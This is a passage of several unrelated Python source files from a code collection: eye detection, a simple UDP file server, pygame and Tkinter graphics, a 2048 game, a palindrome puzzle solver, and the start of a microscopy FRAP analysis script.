,.05))\n","sub_path":"data/Gensim Summarization with text file to string/Summarizer.py","file_name":"Summarizer.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"239298295","text":"import cv2\r\nimport os\r\n\r\nclass EyesDetect:\r\n\r\n\tdef __init__(self):\r\n\t\tself.eyeCascade = cv2.CascadeClassifier('haarcascade_eye_tree_eyeglasses.xml')\r\n\r\n\tdef detect(self, image_path):\r\n\t\timg = cv2.imread(image_path)\r\n\t\tframe = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\t\teyes = self.eyeCascade.detectMultiScale(frame,\r\n\t\t\t\t\t\t\tscaleFactor=1.1,\r\n\t\t\t\t\t\t\tminNeighbors=5,\r\n\t\t\t\t\t\t\tminSize=(30, 30),\r\n\t\t\t\t\t\t\t)\r\n\t\tif len(eyes) == 0:\r\n\t\t\tos.remove(image_path)\r\n\t\t\treturn 
'closed'\r\n\t\telse:\r\n\t\t\tos.remove(image_path)\r\n\t\t\treturn 'opened'\r\n","sub_path":"close_eye_detect.py","file_name":"close_eye_detect.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"556189167","text":"from socket import *\nserverName = \"10.124.7.86\"\nserverPort = 1200\nserverSocket = socket(AF_INET,SOCK_DGRAM)\nserverSocket.bind((serverName,serverPort))\nprint(\"The Server is ready to receive...\")\nwhile 1:\n sentence, clientaddr= serverSocket.recvfrom(2048)\n file1 = open(sentence,\"r\")\n line = file1.read(2048)\n serverSocket.sendto(bytes(line,\"utf-8\"),clientaddr)\n print(\"Sent to Client...\")\n file1.close()\n","sub_path":"Socket-Programs/UDP/server_udp.py","file_name":"server_udp.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"538603751","text":"import pygame\nimport numpy as np\nfrom utils.extramath import avg\nfrom utils.pygame_utils import scale_points\n\ndrawline = pygame.draw.line\n\nclass Grid(object):\n\n def __init__(self, window=((-10, 10), (-10, 10)), interval=1):\n x,y = pygame.display.get_surface().get_size()\n self.screen_center = [x/2, y/2]\n self.scale = (x/(window[0][1]-window[0][0]), y/(window[0][1]-window[0][0]))\n self.lower = window[1][0]\n self.left = window[0][0]\n self.upper = window[1][1]\n self.right = window[0][1]\n self.scaled_lower = 0\n self.scaled_left = 0\n self.scaled_upper = y\n self.scaled_right = x\n self.x_axis = avg(self.lower, self.upper)\n self.y_axis = avg(self.left, self.right)\n self.scaled_xax = self.x_axis * self.scale[1] + self.screen_center[1]\n self.scaled_yax = self.y_axis * self.scale[0] + self.screen_center[0]\n\n self.interval = interval\n\n self.x_locations = np.array([x for x in np.arange(self.y_axis, self.right + self.interval, self.interval)])\n self.y_locations = np.array([y for y in np.arange(self.x_axis, self.upper + self.interval, self.interval)])\n\n self.original_lattice = np.array([[[x, y] for x in np.arange(self.left, self.right + self.interval, self.interval)]\n for y in np.arange(self.lower, self.upper + self.interval, self.interval)])\n\n\n def draw_grid(self, screen, line_width=2, color=(0, 0, 0)):\n for x in scale_points(self.x_locations, self.scale[0], self.screen_center[0]):\n drawline(screen, color, (x, self.scaled_lower), (x, self.scaled_upper), line_width)\n for x in scale_points(-self.x_locations, self.scale[0], self.screen_center[0]):\n drawline(screen, color, (x, self.scaled_lower), (x, self.scaled_upper), line_width)\n for y in scale_points(self.y_locations, self.scale[1], self.screen_center[1]):\n drawline(screen, color, (self.scaled_left, y), (self.scaled_right, y), line_width)\n for y in scale_points(-self.y_locations, self.scale[1], self.screen_center[1]):\n drawline(screen, color, (self.scaled_left, y), (self.scaled_right, y), line_width)\n\n self.draw_axes(screen, color=color)\n\n def draw_axes(self, screen, line_width=4, color=(0, 0, 0)):\n drawline(screen, (0, 0, 255), (self.scaled_yax, self.scaled_lower), (self.scaled_yax, self.scaled_upper), line_width)\n drawline(screen, (0, 0, 255), (self.scaled_left * self.scale[0], self.scaled_xax), (self.scaled_right, self.scaled_xax), line_width)","sub_path":"utils/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} 
+{"seq_id":"482170795","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom PIL import Image, ImageDraw, ImageOps, ImageFont, ImageFilter, ImageChops, ImageColor, ImageTk, ImageDraw\r\nimport time, re, copy, os, codecs, random, datetime, json\r\nimport tkinter\r\nimport threading\r\n\r\nclass dotworker(object):\r\n monimagearray = []\r\n monanim = 0\r\n monarray = []\r\n moncountwait = 0\r\n bgimagearray = []\r\n bgimagepos = 0\r\n bgimagetype = 0\r\n bgimagenexttype = 0\r\n fontreg = 0\r\n fontbold = 0\r\n statusbg = 0\r\n\r\n def imagenew(self):\r\n imagecolorspace = 'RGB'\r\n imagecolorfill = (0, 0, 80)\r\n imagesizex = 64\r\n imagesizey = 128\r\n image = Image.new(imagecolorspace, (imagesizex, imagesizey), imagecolorfill)\r\n return (image)\r\n\r\n def bginit(self,basedir):\r\n for x in range(0,3):\r\n bgimagearraytemp = []\r\n for y in range(0,3):\r\n file = str(x) + \"_\" + str(y) + \".png\"\r\n image = Image.open(basedir + \"images/daihaikei/\" + file).convert(\"RGBA\")\r\n bgimagearraytemp.append(image)\r\n self.bgimagearray.append(bgimagearraytemp)\r\n\r\n def bgdraw(self,parm):\r\n baseimage = 0\r\n addimage = 1\r\n alpha = float( parm / 50 )\r\n if parm > 49:\r\n baseimage = 1\r\n addimage = 2\r\n alpha = float((parm - 50 ) / 50 )\r\n self.bgimagepos = self.bgimagepos + 1\r\n if self.bgimagepos > 255:\r\n self.bgimagetype = self.bgimagenexttype\r\n self.bgimagepos = 11\r\n if self.bgimagepos > 245:\r\n if self.bgimagenexttype == self.bgimagetype:\r\n rnd = int (random.uniform(0,2)) + 1\r\n if rnd == 3:\r\n rnd = 1\r\n self.bgimagenexttype = (self.bgimagetype + rnd) % 3\r\n bgimagep = Image.blend(self.bgimagearray[self.bgimagetype][baseimage],self.bgimagearray[self.bgimagetype][addimage],alpha)\r\n bgimagen = Image.blend(self.bgimagearray[self.bgimagenexttype][baseimage],self.bgimagearray[self.bgimagenexttype][addimage],alpha)\r\n bgimagen.paste(bgimagen,(245,0))\r\n alphan = 1 - ((255 - self.bgimagepos) / 10)\r\n if alphan < 0:\r\n alphan = 0\r\n bgimage = Image.blend(bgimagep,bgimagen,alphan)\r\n else:\r\n bgimage = Image.blend(self.bgimagearray[self.bgimagetype][baseimage],self.bgimagearray[self.bgimagetype][addimage],alpha)\r\n bgimageposend = self.bgimagepos + 64\r\n image = bgimage.crop((self.bgimagepos,131,bgimageposend,259))\r\n return (image)\r\n\r\n def moninit(self,basedir):\r\n files = os.listdir(basedir + \"images/picsqMobchip/4houkou/\")\r\n for file in files:\r\n if not 'png' in file:\r\n continue\r\n image = Image.open(basedir + \"images/picsqMobchip/4houkou/\" + file).convert(\"RGBA\")\r\n for x in range(image.size[0]):\r\n for y in range(image.size[1]):\r\n pixel = image.getpixel( (x, y) )\r\n if pixel[0] == 255 and pixel[1] == 255 and pixel[2] == 255:\r\n image.putpixel( (x, y), (255,255,255,0) )\r\n monimagearraytempy = []\r\n for y in range(0,4):\r\n monimagearraytempx = []\r\n for x in range(0,3):\r\n cropylow = y * 32\r\n cropyhigh = cropylow + 32\r\n cropxlow = x * 32\r\n cropxhigh = cropxlow + 32\r\n monimagearraytempx.append(image.crop((cropxlow,cropylow,cropxhigh,cropyhigh)))\r\n monimagearraytempy.append(monimagearraytempx)\r\n self.monimagearray.append(monimagearraytempy)\r\n\r\n def mondraw(self,image,parm,parm2):\r\n self.monanim = self.monanim + 1\r\n if self.monanim > 11:\r\n self.monanim = 0\r\n monanimpointer = int(self.monanim / 4)\r\n moncounttarget = int(parm / 10)\r\n monspeedtarget = int(parm2 / 20)\r\n if monspeedtarget < 1:\r\n monspeedtarget = 1\r\n if len(self.monarray) < moncounttarget:\r\n self.moncountwait = 
self.moncountwait + 1\r\n moncountrsv = moncounttarget - len(self.monarray)\r\n moncountscale = 64 / moncounttarget\r\n moncountper = ( moncountrsv / 64) * 100\r\n if self.moncountwait > moncountscale:\r\n moncountper = moncountper * self.moncountwait\r\n else:\r\n moncountper = moncountper / 5\r\n if random.uniform(0,100) < moncountper:\r\n self.moncountwait = 0\r\n montype = int(random.uniform(0,len(self.monimagearray)))\r\n if montype == len(self.monimagearray):\r\n montype = 0\r\n mony = int(random.uniform(0,30))\r\n self.monarray.append([montype,monspeedtarget,1000,mony])\r\n newmonarray = []\r\n for moni in range(0,len(self.monarray)):\r\n if self.monarray[moni][2] == 1000:\r\n self.monarray[moni][2] = -32\r\n else:\r\n self.monarray[moni][2] = self.monarray[moni][2] + self.monarray[moni][1]\r\n if self.monarray[moni][2] > 63:\r\n continue\r\n newmonarray.append(self.monarray[moni])\r\n monp = self.monarray[moni][0]\r\n monx = self.monarray[moni][2]\r\n mony = self.monarray[moni][3] + 65\r\n monimage = Image.new(\"RGBA\",(64,128),(255,255,255,0))\r\n monimage.paste(self.monimagearray[monp][2][monanimpointer],(monx,mony))\r\n image = Image.alpha_composite(image,monimage)\r\n self.monarray = newmonarray\r\n return (image)\r\n\r\n def statusinit(self,basedir):\r\n fontdata = basedir + \"PixelMplus10-Regular.ttf\"\r\n self.fontreg = ImageFont.truetype(fontdata, 10)\r\n fontdata = basedir + \"PixelMplus10-Bold.ttf\"\r\n self.fontbold = ImageFont.truetype(fontdata, 10)\r\n self.statusbg = Image.new(\"RGBA\",(64,128),(0,0,0,0))\r\n statusspace = Image.new(\"RGBA\",(64,48),(0,0,0,0))\r\n draw = ImageDraw.Draw(statusspace)\r\n draw.rectangle((2,2,62,46),fill=(0,0,0,32))\r\n draw.text((3,3), \"CPU\", (255, 255, 255,128),font=self.fontbold)\r\n draw.text((3,25), \"GPU\", (255, 255, 255,128),font=self.fontbold)\r\n self.statusbg.paste(statusspace,(0,0))\r\n\r\n def statusdraw(self,image,cpufreq,cpuload,cputemp,gpuload,gputemp):\r\n cpufreq = int(cpufreq)\r\n cpufreq = str(cpufreq).rjust(4)\r\n cpuload = int(cpuload)\r\n cpuload = str(cpuload).rjust(3)\r\n cputemp = int(cputemp)\r\n cputemp = str(cputemp).rjust(2)\r\n gpuload = int(gpuload)\r\n gpuload = str(gpuload).rjust(3)\r\n gputemp = int(gputemp)\r\n gputemp = str(gputemp).rjust(2)\r\n statusimage = copy.copy(self.statusbg)\r\n draw = ImageDraw.Draw(statusimage)\r\n draw.text((25,4), cpufreq + \" MHz\", (0, 0, 0, 128),font=self.fontreg)\r\n draw.text((4,14), cpuload + \" % \" + cputemp +\" C\", (0, 0, 0, 128),font=self.fontreg)\r\n draw.text((4,36), gpuload + \" % \" + gputemp +\" C\", (0, 0, 0, 128),font=self.fontreg)\r\n draw.text((24,3), cpufreq + \" MHz\", (255, 255, 255,128),font=self.fontreg)\r\n draw.text((3,13), cpuload + \" % \" + cputemp +\" C\", (255, 255, 255,128),font=self.fontreg)\r\n draw.text((3,35), gpuload + \" % \" + gputemp +\" C\", (255, 255, 255,128),font=self.fontreg)\r\n\r\n image = Image.alpha_composite(image,statusimage)\r\n return (image)\r\n\r\ndef guiinit():\r\n global item, canvas, img\r\n root = tkinter.Tk()\r\n root.title('test')\r\n root.geometry(\"64x128\")\r\n img = Image.new(\"RGB\", (64, 128), (0,0,0))\r\n img = ImageTk.PhotoImage(img)\r\n canvas = tkinter.Canvas(bg = \"black\", width=64, height=128)\r\n canvas.place(x=0, y=0)\r\n item = canvas.create_image(0, 0, image=img, anchor=tkinter.NW)\r\n root.mainloop()\r\n\r\ndef main():\r\n basedir = \"./\"\r\n thread1 = threading.Thread(target=guiinit)\r\n thread1.setDaemon(True)\r\n thread1.start()\r\n time.sleep(1)\r\n\r\n dot = dotworker()\r\n image = 
dot.imagenew()\r\n dot.bginit(basedir)\r\n dot.moninit(basedir)\r\n dot.statusinit(basedir)\r\n\r\n while True:\r\n bgimage = dot.bgdraw(60)\r\n image = dot.mondraw(bgimage,60,60)\r\n image = dot.statusdraw(image,\"5000\",\"60\",\"20\",\"30\",\"40\")\r\n\r\n imageoutput = ImageTk.PhotoImage(image)\r\n canvas.itemconfig(item,image=imageoutput,anchor=tkinter.NW)\r\n time.sleep(0.05)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"dotmonitor.py","file_name":"dotmonitor.py","file_ext":"py","file_size_in_byte":8595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"540792391","text":"from tkinter import *\nfrom random import randint\nimport func\n\n# Set up DEBUG_MODE\nDEBUG_MODE = True\nif DEBUG_MODE:\n\tlog_file = open('log_file.txt', 'w')\n\tprint('LOG FILE (DEBUG_MODE = TRUE)', file = log_file)\n\n# Game constants\nSIZE_X = 725\nSIZE_Y = 725\nSIZE_CELL = 150\n\n# Open the window\nroot = Tk()\nroot.title('2048 Game')\nroot.minsize(SIZE_X, SIZE_Y)\ncanv = Canvas(width = SIZE_X, height = SIZE_Y, bg = 'papaya whip')\ncanv.pack()\n\n# Set up the field\nfield = []\nfor _ in range(4):\n\tfield.append([None, None, None, None])\nfield[randint(0, 3)][randint(0, 3)] = 2\nrandomX = randint(0, 3)\nrandomY = randint(0, 3)\nwhile field[randomX][randomY] != None:\n\trandomX = randint(0, 3)\n\trandomY = randint(0, 3)\nfield[randomX][randomY] = 2\n\n# Function for exiting the game\ndef exit_f():\n\texit(0)\n\n# Function for writing the field to the log file\ndef log_field():\n\tfor row in field:\n\t\tfor element in row:\n\t\t\tprint(element, end = ' ', file = log_file)\n\t\tprint('' , file = log_file)\n\nif DEBUG_MODE:\n\tprint('FIELD GENERATED', file = log_file)\n\tlog_field()\n\n# Function for drawing the field\ndef draw_field(field):\n\tfor row in range(len(field)):\n\t\tfor cell in range(len(field[row])):\n\t\t\tif field[row][cell] == None:\n\t\t\t\tcolor = 'cornsilk3'\n\t\t\tif field[row][cell] == 2:\n\t\t\t\tcolor = 'gainsboro'\n\t\t\tif field[row][cell] == 4:\n\t\t\t\tcolor = 'snow2'\n\t\t\tif field[row][cell] == 8:\n\t\t\t\tcolor = 'dark orange'\n\t\t\tif field[row][cell] == 16:\n\t\t\t\tcolor = 'salmon'\n\t\t\tif field[row][cell] == 32:\n\t\t\t\tcolor = 'tomato'\n\t\t\tif field[row][cell] == 64:\n\t\t\t\tcolor = 'red'\n\t\t\tif field[row][cell] == 128:\n\t\t\t\tcolor = 'light goldenrod'\n\t\t\tif field[row][cell] == 256:\n\t\t\t\tcolor = 'gold2'\n\t\t\tif field[row][cell] == 512:\n\t\t\t\tcolor = 'goldenrod1'\n\t\t\tif field[row][cell] == 1024:\n\t\t\t\tcolor = 'tan1'\n\t\t\tif field[row][cell] == 2048:\n\t\t\t\tcolor = 'gold'\n\t\t\tcanv.create_rectangle(25 + cell * 150 + 10 * cell, 25 + row * 150 + 10 * row, 25 + cell * 150 + 150 + 10 * cell, 25 + row * 150 + 150 + 10 * row, fill = color)\n\t\t\tif field[row][cell] != None:\n\t\t\t\tcanv.create_text(25 + cell * 150 + 10 * cell + 75, 25 + row * 150 + 10 * row + 75, font = ('Purisa', 45), text = str(field[row][cell]))\n\n# Spawn a new tile (2 or 4) after a move\ndef after_move():\n\trandomposX = randint(0, len(field) - 1)\n\trandomposY = randint(0, len(field) - 1)\n\tflag = True\n\tfor i in range(len(field)):\n\t\tfor j in range(len(field)):\n\t\t\tif field[i][j] == None: flag = False\n\tif not flag:\n\t\twhile field[randomposX][randomposY] != None:\n\t\t\trandomposX = randint(0, len(field) - 1)\n\t\t\trandomposY = randint(0, len(field) - 1)\n\t\trandomInt = randint(1, 100)\n\t\t# Spawn chance: 2 - 90%, 4 - 10%\n\t\tif randomInt % 10 == 0:\n\t\t\tfield[randomposX][randomposY] = 
4\n\t\telse:\n\t\t\tfield[randomposX][randomposY] = 2\n\t\tif DEBUG_MODE:\n\t\t\tprint(f'SPAWNED NEW TILE {field[randomposX][randomposY]} ON POSITION [{randomposX + 1}, {randomposY + 1}]', file = log_file)\n\t\t\tlog_field()\n\t\tif not func.up_dir(field) and not func.down_dir(field) and not func.left_dir(field) and not func.right_dir(field):\n\t\t\tcanv.delete('all')\n\t\t\tcanv.create_text((360, 360), text = 'You lose')\n\t\t\troot.after(1000, exit_f)\t\t \n\n# Move up\ndef up_dir(event):\n\tprint('UP SHIFT', file = log_file)\n\tflag = False\n\tfor i in range(len(field)):\n\t\t# Build the line to shift\n\t\tline = []\n\t\tfor j in range(0, len(field)):\n\t\t\tline.append(field[j][i])\n\t\tline_f = line\n\t\tline = list(filter(lambda el : el != None, line))\n\t\tel = len(line) - 1\n\t\t# Shift along the line\n\t\twhile el > 0:\n\t\t\tif line[el] == line[el - 1] and line[el] != None:\n\t\t\t\tline[el - 1] *= 2\n\t\t\t\tline[el] = None\n\t\t\t\tif DEBUG_MODE:\n\t\t\t\t\tprint(f'NEW TILE {line[el - 1]} GENERATED AFTER ADDITION', file = log_file)\n\t\t\t\tel -= 1\n\t\t\tel -= 1\n\t\tline = list(filter(lambda el : el != None, line))\n\t\twhile len(line) < len(field[0]):\n\t\t\tline.append(None)\n\t\tfor j in range(0, len(field)):\n\t\t\tfield[j][i] = line[j]\n\t\tif line_f != line: flag = True\n\tlog_field()\n\t# If there was at least one shift, spawn a new tile\n\tif flag: after_move()\n\tdraw_field(field)\n\n# Move down\ndef down_dir(event):\n\tprint('DOWN SHIFT', file = log_file)\n\tflag = False\n\tfor i in range(len(field)):\n\t\tline = []\n\t\tfor j in range(0, len(field)):\n\t\t\t# Build the line to shift\n\t\t\tline.append(field[j][i])\n\t\tline_f = line\n\t\tline = list(filter(lambda el : el != None, line))\n\t\tel = 0\n\t\t# Shift along the line\n\t\twhile el < len(line) - 1:\n\t\t\tif line[el] == line[el + 1] and line[el] != None:\n\t\t\t\tline[el + 1] *= 2\n\t\t\t\tline[el] = None\n\t\t\t\tif DEBUG_MODE:\n\t\t\t\t\tprint(f'NEW TILE {line[el + 1]} GENERATED AFTER ADDITION', file = log_file)\n\t\t\t\tel += 1\n\t\t\tel += 1\n\t\tline = list(filter(lambda el : el != None, line))\n\t\twhile len(line) < len(field[0]):\n\t\t\tline.insert(0, None)\n\t\tfor j in range(0, len(field)):\n\t\t\tfield[j][i] = line[j]\n\t\tif line_f != line: flag = True\n\tlog_field()\n\t# If there was at least one shift, spawn a new tile\n\tif flag: after_move()\t\n\tdraw_field(field)\n\n# Move right\ndef right_dir(event):\n\tprint('RIGHT SHIFT', file = log_file)\n\tflag = False\n\tfor i in range(len(field)):\n\t\t# Build the line to shift\n\t\tline = field[i]\n\t\tline_f = field[i]\n\t\tline = list(filter(lambda el : el != None, line))\n\t\tel = 0\n\t\t# Shift along the line\n\t\twhile el < len(line) - 1:\n\t\t\tif line[el] == line[el + 1] and line[el] != None:\n\t\t\t\tline[el + 1] *= 2\n\t\t\t\tline[el] = None\n\t\t\t\tif DEBUG_MODE:\n\t\t\t\t\tprint(f'NEW TILE {line[el + 1]} GENERATED AFTER ADDITION', file = log_file)\n\t\t\t\tel += 1\n\t\t\tel += 1\n\t\tline = list(filter(lambda el : el != None, line))\n\t\twhile len(line) < len(field[0]):\n\t\t\tline.insert(0, None)\n\t\tfield[i] = line\n\t\tif line_f != line: flag = True\n\tlog_field()\n\t# If there was at least one shift, spawn a new tile\n\tif flag: after_move()\n\tdraw_field(field)\n\n# Move left\ndef left_dir(event):\n\tprint('LEFT SHIFT', file = log_file)\n\tflag = False\n\tfor i in range(len(field)):\n\t\t# Build the line to shift\n\t\tline = field[i]\n\t\tline_f = field[i]\n\t\tline = list(filter(lambda 
el : el != None, line))\n\t\tel = len(line) - 1\n\t\t# Shift along the line\n\t\twhile el > 0:\n\t\t\tif line[el] == line[el - 1] and line[el] != None:\n\t\t\t\tline[el - 1] *= 2\n\t\t\t\tline[el] = None\n\t\t\t\tif DEBUG_MODE:\n\t\t\t\t\tprint(f'NEW TILE {line[el - 1]} GENERATED AFTER ADDITION', file = log_file)\n\t\t\t\tel -= 1\n\t\t\tel -= 1\n\t\tline = list(filter(lambda el : el != None, line))\n\t\twhile len(line) < len(field[0]):\n\t\t\tline.append(None)\n\t\tfield[i] = line\n\t\tif line_f != line: flag = True\n\tlog_field()\n\t# If there was at least one shift, spawn a new tile\n\tif flag: after_move()\n\tdraw_field(field)\t\n\n# Draw the field at the start of the game\ndraw_field(field)\n\n# When an arrow key is pressed, call the corresponding function\nroot.bind('<Up>', up_dir)\nroot.bind('<Down>', down_dir)\nroot.bind('<Right>', right_dir)\nroot.bind('<Left>', left_dir)\nroot.mainloop()\n\nlog_file.close()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"23975638","text":"import math\n\n\nclass Solution:\n def superpalindromesInRange(self, L, R):\n \"\"\"\n :type L: str\n :type R: str\n :rtype: int\n \"\"\"\n minimum = math.ceil(math.sqrt(int(L)))\n maximum = math.floor(math.sqrt(int(R)))\n minText = str(minimum)\n leftText = minText[:math.ceil(len(minText) / 2)]\n leftNum = int(leftText)\n rightLen = len(minText) - len(leftText)\n supers = []\n while True:\n num = int(leftText + leftText[:rightLen][::-1])\n nextLeftNum = leftNum + 1\n nextLeftText = str(nextLeftNum)\n leftNum, leftText, rightLen = (nextLeftNum, nextLeftText, rightLen) \\\n if len(nextLeftText) == len(leftText) or rightLen == len(leftText) \\\n else (int(nextLeftNum / 10), nextLeftText[:-1], rightLen + 1)\n if num > maximum:\n break\n if num >= minimum and self.isPalindrome(num * num):\n supers.append(num)\n return len(supers)\n\n def isPalindrome(self, num):\n sqText = str(num)\n return sqText == sqText[::-1]\n\n\nsol = Solution()\nret = sol.superpalindromesInRange('1', '1000000000000000000')\nprint(ret)\n","sub_path":"src/super-palindromes.py","file_name":"super-palindromes.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"416787771","text":"import numpy as np\nimport pandas as pd\nimport napari\nfrom pycromanager import Bridge\nfrom matplotlib.backends.qt_compat import QtCore, QtWidgets\n\nif QtCore.qVersion() >= \"5.\":\n from matplotlib.backends.backend_qt5agg import FigureCanvas\nelse:\n from matplotlib.backends.backend_qt4agg import FigureCanvas\nfrom matplotlib.figure import Figure\nfrom vispy.color import Colormap\nfrom shared.find_organelles import find_organelle, organelle_analysis, find_nuclear_nucleoli, nuclear_analysis\nfrom skimage.measure import label, regionprops_table\nfrom skimage.morphology import medial_axis\nimport shared.analysis as ana\nimport shared.dataframe as dat\nimport shared.display as dis\nimport shared.objects as obj\nimport shared.bleach_points as ble\nimport shared.math_functions as mat\nimport os\n\n\"\"\"\n# ---------------------------------------------------------------------------------------------------\n# FRAP ANALYSIS for NUCLEOLI (SINGLE-FOV)\n# ---------------------------------------------------------------------------------------------------\n\nEXPECTS \n an uManager data (single z, single p),\nSEGMENTS and ANALYZES\n nuclear properties (enables x, y position 
and number of nucleoli), nucleoli properties (enables \n x, y position, size, mean intensity (without correction), circularity, eccentricity and \n corresponding nuclear index,\nDETECTS and ANALYZES\n bleach spots to measure FRAP curves. Intensities were background and photobleaching corrected and\n normalized based on pre-bleach intensity and minimum intensity, curves were then fitted with \n single exponential function and mobile fraction and t-half were calculated based on fitting,\nEXPORTS \n data.txt: simplified bleach spots related information\n data_full.txt: full bleach spots related information\n data_log.txt: some information during analysis\n data_nuclear.txt: nuclear relevant information\n data_nucleoli.txt: nucleoli relevant information\n data_ctrl.txt: control spots relevant information\n offset_map.pdf: offset map, aim spots (coordinates get from .log file) are centered to (0,0), \n non (0,0) end of the lines indicate location of detected bleach spots relative to aim spots\n raw_intensity.pdf: raw intensity curves of bleach spots, control spots and background and \n background linear fit curve\n pb_factor.pdf: photobleach factor curve and its single exponential decay fit curve\n double_corrected_intensity.pdf: double corrected intensity curves of bleach spots\n normalized_frap_curves.pdf: normalized FRAP curves\n normalized_frap_curves_filtered.pdf: normalized FRAP curves after filtering and their \n corresponding single exponential fitting curves\n frap_curves_filtered_NUMBER.pdf: each single normalized FRAP curve and its corresponding single \n exponential fitting curve\nDISPLAYS \n images (raw image, nuclear, nucleoli, aim spots, color coded bleach spots) in napari, images \n (double corrected intensity curves, normalized filtered FRAP curves and their fitting curves, \n offset map) in matplotlib viewer.\n\n# ----------------------------------\n# PARAMETERS ALLOW CHANGE\n# ----------------------------------\n\n # paths\n data_path: directory of uManager data\n save_path: primary directory for output saving\n\n # values for analysis\n data_c: channel to be analyzed\n pos: position of the given FOV in multi-image dataset, default = 0\n thresholding: global thresholding method used for nucleoli segmentation; only accepts 'na', \n 'otsu', 'yen', 'local-nucleoli' and 'local-sg'\n min_size: the smallest allowable nucleoli size\n max_size: the largest allowable nucleoli size\n num_dilation: number of dilation used to generate bleach spots, determines size of bleach spots\n default = 3\n\n # modes\n mode_bleach_detection: bleach spots detection modes; only accept 'single-raw' or 'single-offset'\n display_mode: displays stitched images in napari or not; only accepts 'N' or 'Y'\n\n\"\"\"\n\n# --------------------------\n# PARAMETERS allow change\n# --------------------------\n# Please changes\ndata_path = \"/Users/xiaoweiyan/Dropbox/LAB/ValeLab/Projects/Blob_bleacher/Data/\"\\\n \"20210203_CBB_nucleoliArsAndHeatshockTreatment/data/WT/C2-Site_15_1\"\nsave_path = \"/Users/xiaoweiyan/Dropbox/LAB/ValeLab/Projects/Blob_bleacher/Data/\"\\\n \"20210203_CBB_nucleoliArsAndHeatshockTreatment/dataAnalysis1/WT/C2-Site_15_1\"\nanalyze_organelle = 'nucleoli' # only accepts 'sg' or 'nucleoli'\nfrap_start_delay = 6 # 50ms default = 4; 100ms default = 5; 200ms default = 6\ndisplay_mode = 'Y' # only accepts 'N' or 'Y'\ndisplay_sort = 'pre_bleach_int' # accepts 'na' or other features like 'sg_size'\ndisplay_data = 'local' # only accepts 'bg' or 'local'\n\n# values for analysis\ndata_c = 0\npos = 
0\nnum_dilation = 3 # number of dilation from the coordinate;\n# determines analysis size of the analysis spots; default = 3\n\n# presets\nif analyze_organelle == 'sg':\n thresholding = 'na'\n # global thresholding method; choose in between 'na','otsu','yen', 'local-nucleoli' and 'local-sg'\n min_size = 5 # minimum size; sg default = 5\n max_size = 200 # maximum size; sg default = 200\nelse: # for 'nucleoli'\n thresholding = 'local-nucleoli'\n # global thresholding method; choose in between 'na','otsu','yen', 'local-nucleoli' and 'local-sg'\n min_size = 10 # minimum size; nucleoli default = 10\n max_size = 1000 # maximum size; nucleoli default = 1000;\n # larger ones are generally cells without nucleoli\n\n# modes\nmode_bleach_detection = 'single-offset' # only accepts 'single-raw' or 'single-offset'\nfrap_start_mode = 'min' # only accepts 'delay' or 'min'\nfitting_mode = 'single_exp' # accepts 'single_exp', 'double_exp', 'soumpasis', 'ellenberg', 'optimal'\n\n\"\"\"\n# ---------------------------------------------------------------------------------------------------\n# PLEASE DO NOT CHANGE AFTER THIS\n# ---------------------------------------------------------------------------------------------------\n\"\"\"\n\n# --------------------------\n# LOAD MOVIE\n# --------------------------\nprint(\"### Load movie ...\")\ndata_log = pd.DataFrame({'pos': [pos]})\n\n# build up pycromanager bridge\n# first start up Micro-Manager (needs to be compatible version)\nbridge = Bridge()\nmmc = bridge.get_core()\nmm = bridge.get_studio()\n# load time series data\nstore = mm.data().load_data(data_path, True)\ncb = mm.data().get_coords_builder()\ncb.t(0).p(0).c(0).z(0)\n# get max_t and acquisition time\nmax_t = store.get_max_indices().get_t()\npixels_tseries = dat.get_pixels_tseries(store, cb, data_c)\nacquire_time_tseries, real_time = dat.get_time_tseries(store, cb)\ndata_log['acquire_time'] = [acquire_time_tseries]\ndata_log['real_time'] = [real_time]\n\n# --------------------------------------\n# ORGANELLE ANALYSIS based on time 0\n# --------------------------------------\nprint(\"### Image analysis: %s detection based on time 0 ...\" % analyze_organelle)\n\n# reference image of time 0\n# if decide to use other image as ref_image\n# be sure to check photobleaching correction for all reported intensities\ntemp = store.get_image(cb.c(data_c).t(0).build())\npix = np.reshape(temp.get_raw_pixels(), newshape=[temp.get_height(), temp.get_width()])\n\nif analyze_organelle == 'nucleoli':\n # nuclear detection (currently only doable for nucleoli staining image)\n label_nuclear, _ = find_nuclear_nucleoli(pix)\n data_log['num_nuclei_detected'] = [np.amax(label_nuclear)]\n print(\"Found %d nuclei.\" % data_log['num_nuclei_detected'][0])\n\n# organelle detection\norganelle_before_filter, organelle = find_organelle(pix, thresholding, min_size=min_size, max_size=max_size)\nlabel_organelle = label(organelle, connectivity=1)\ndata_log['num_%s_detected' % analyze_organelle] = [obj.object_count(organelle)]\nprint(\"Found %d %s.\" % (data_log['num_%s_detected' % analyze_organelle][0], analyze_organelle))\n\n# organelle pd dataset\norganelle_pd = organelle_analysis(pix, organelle, '%s' % analyze_organelle, pos)\n\nif analyze_organelle == 'nucleoli':\n # link nucleoli with corresponding nuclear\n round_x = [round(num) for num in organelle_pd['x']]\n round_y = [round(num) for num in organelle_pd['y']]\n organelle_pd['nuclear'] = obj.points_in_objects(label_nuclear, round_y, round_x)\n\n # nuclear pd dataset\n nuclear_pd = 
